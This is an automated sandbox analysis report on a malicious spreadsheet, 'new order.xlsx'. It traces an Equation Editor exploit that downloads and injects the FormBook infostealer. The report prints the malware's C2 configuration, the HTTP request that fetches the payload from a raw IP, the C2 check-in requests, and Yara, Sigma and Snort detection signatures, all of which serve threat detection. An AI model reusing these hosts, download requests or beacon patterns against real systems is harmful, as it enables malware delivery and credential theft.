Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report new order.xlsx

Overview

General Information

Sample Name:new order.xlsx
Analysis ID:452636
MD5:d59accd992813d35bb00a4b3f84c4ffe
SHA1:851d437a71d1a156e0adb9f553611865b8c90d94
SHA256:002e54405b1ce6dd9710be53d71e832fcffc92fb63fc8ef3a37d14e0867c4c10
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2752 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2368 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2592 cmdline: 'C:\Users\Public\vbc.exe' MD5: 750919BD7E02E7821EFA1B1BD0ED4EDA)
      • vbc.exe (PID: 856 cmdline: C:\Users\Public\vbc.exe MD5: 750919BD7E02E7821EFA1B1BD0ED4EDA)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wlanext.exe (PID: 1428 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
            • cmd.exe (PID: 2544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.conectaragora.com/n84e/"], "decoy": ["upscalebuyer.com", "qtict.net", "karlgillard.com", "fangsbags.com", "blackwhitebangtan.com", "lojaautomatica.com", "browbabelondon.com", "dupladocabelo.com", "tcheap3dwdshop.com", "htnmg.com", "globaltradeview.com", "instrumentwinebreathe.net", "futurejobstech.com", "notemanches.com", "myconventionalcooking.xyz", "doniang.com", "ouruiwh.com", "tecnologiatimes.com", "yxbmfc.com", "mae-baby.com", "alsiha2020.com", "zenqueue.com", "myomlineservicing.com", "justin-appel.com", "protectallfarms.com", "fairwaysxm.com", "msec-santander.com", "previem.com", "legifo.com", "reitzforrep.com", "oanicoin.com", "scorchonerecords.com", "hheiy35.com", "aurorabradfordoptometrists.com", "kailinsen.com", "ownerspreinspect.com", "instantfames.com", "wdi.technology", "compareionizers.com", "habbuhot.info", "thinking-diversity.com", "swagmansbreakfast.com", "thepegasusclub.com", "crazyhorseoutfitters.com", "flvrpodcast.com", "mz66a.com", "vineyardtrailrides.com", "khazana-bazaar.com", "m-corgroup.com", "kidsnbuds.com", "whatsprosender.com", "lundagers.com", "betterhealthdc.com", "mehtalawgroup.com", "contex33.xyz", "fastloanflorida.net", "lautaigia.net", "792argonne.com", "xtravigant.com", "anbotechsolution.com", "minipockethouse.com", "ehubo3y.com", "greaterdenver.online", "batracomputer.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.155.80.130, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2368, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2592
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2592

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.conectaragora.com/n84e/"], "decoy": ["upscalebuyer.com", "qtict.net", "karlgillard.com", "fangsbags.com", "blackwhitebangtan.com", "lojaautomatica.com", "browbabelondon.com", "dupladocabelo.com", "tcheap3dwdshop.com", "htnmg.com", "globaltradeview.com", "instrumentwinebreathe.net", "futurejobstech.com", "notemanches.com", "myconventionalcooking.xyz", "doniang.com", "ouruiwh.com", "tecnologiatimes.com", "yxbmfc.com", "mae-baby.com", "alsiha2020.com", "zenqueue.com", "myomlineservicing.com", "justin-appel.com", "protectallfarms.com", "fairwaysxm.com", "msec-santander.com", "previem.com", "legifo.com", "reitzforrep.com", "oanicoin.com", "scorchonerecords.com", "hheiy35.com", "aurorabradfordoptometrists.com", "kailinsen.com", "ownerspreinspect.com", "instantfames.com", "wdi.technology", "compareionizers.com", "habbuhot.info", "thinking-diversity.com", "swagmansbreakfast.com", "thepegasusclub.com", "crazyhorseoutfitters.com", "flvrpodcast.com", "mz66a.com", "vineyardtrailrides.com", "khazana-bazaar.com", "m-corgroup.com", "kidsnbuds.com", "whatsprosender.com", "lundagers.com", "betterhealthdc.com", "mehtalawgroup.com", "contex33.xyz", "fastloanflorida.net", "lautaigia.net", "792argonne.com", "xtravigant.com", "anbotechsolution.com", "minipockethouse.com", "ehubo3y.com", "greaterdenver.online", "batracomputer.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeReversingLabs: Detection: 32%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 32%
          Multi AV Scanner detection for submitted fileShow sources
          Source: new order.xlsxVirustotal: Detection: 30%Perma Link
          Source: new order.xlsxReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeJoe Sandbox ML: detected
          Source: 7.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000007.00000002.2246150655.00000000002A9000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi7_2_0041568C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi9_2_000D568C
          Source: global trafficDNS query: name: www.thinking-diversity.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.80.130:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.80.130:80
          Source: excel.exeMemory has grown: Private usage: 4MB later: 74MB

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2019696 ET TROJAN Possible MalDoc Payload Download Nov 11 2014 192.168.2.22:49167 -> 103.155.80.130:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.conectaragora.com/n84e/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 15:11:11 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20Last-Modified: Wed, 21 Jul 2021 22:09:30 GMTETag: "b0200-5c7a96cb69dfd"Accept-Ranges: bytesContent-Length: 721408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 97 f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 f6 0a 00 00 0a 00 00 00 00 00 00 8e 14 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 14 0b 00 4f 00 00 00 00 20 0b 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 f4 0a 00 00 20 00 00 00 f6 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 06 00 00 00 20 0b 00 00 08 00 00 00 f8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 58 ed 09 00 e4 26 01 00 03 00 00 00 e0 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 4f 11 7a bb aa 11 a4 54 af 14 0e 18 4e 1f b2 7e 2f e0 d0 10 2d e5 ba c2 08 75 c0 0a 4a 46 84 79 3f ae ef 45 5c d5 21 7f 3c f3 5f 91 c7 cb 7c 12 64 49 a9 c0 36 fc 99 f9 13 da 5c 84 10 3c a7 e6 19 6a fb 99 18 14 cc 0d 06 39 d0 cd d3 a7 8d 23 60 04 c4 87 55 cd 45 8f 04 06 13 83 62 f5 c3 bd 16 98 84 e2 ca c1 75 a7 90 70 a0 88 07 46 89 2b d3 ea 6c 71 cd f2 29 84 45 3d 6d 15 9e c0 c6 32 ce 18 e9 6d 8f 27 b8 38 2f 1a 64 6b b2 9f af c4 ac ea 15 f7 59 d1 4a 15 66 98 cc 6c 90 9b b9 68 d6 4e c0 76 b3 39 42 b6 2a da b8 a5 e2 99 f5 8e 8d 80 92 86 35 25 ee 6b 4f 55 41 4b a5 02 fb 0a 84 1d 8d 5e 0b ee e4 63 30 56 07 11 9a 30 85 44 e5 e8 1f f2 b5 d7 97 9a 83 b4 f4 99 e7 f5 1e 9b f2 f9 18 03 8a 1e e9 0e d1 53 e8 b8 c4 e6 1d 90 a1 f4 94 6b 31 ce 15 63 5f be 27 54 91 c9 7a 69 3a 8c ca fe 15 cd 42 ff 17 72 ff 2a 76 96 63 a1 4e 14 72 11 50 e4 fd 6f fe 17 f5 7b 8a ac c5 12 28 0b b2 f9 4d ee 3
          Source: global trafficHTTP traffic detected: GET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1Host: www.thinking-diversity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1Host: www.globaltradeview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
          Source: global trafficHTTP traffic detected: GET /kung/bin.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.80.130Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: unknownTCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\238B5502.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /kung/bin.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.80.130Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1Host: www.thinking-diversity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1Host: www.globaltradeview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
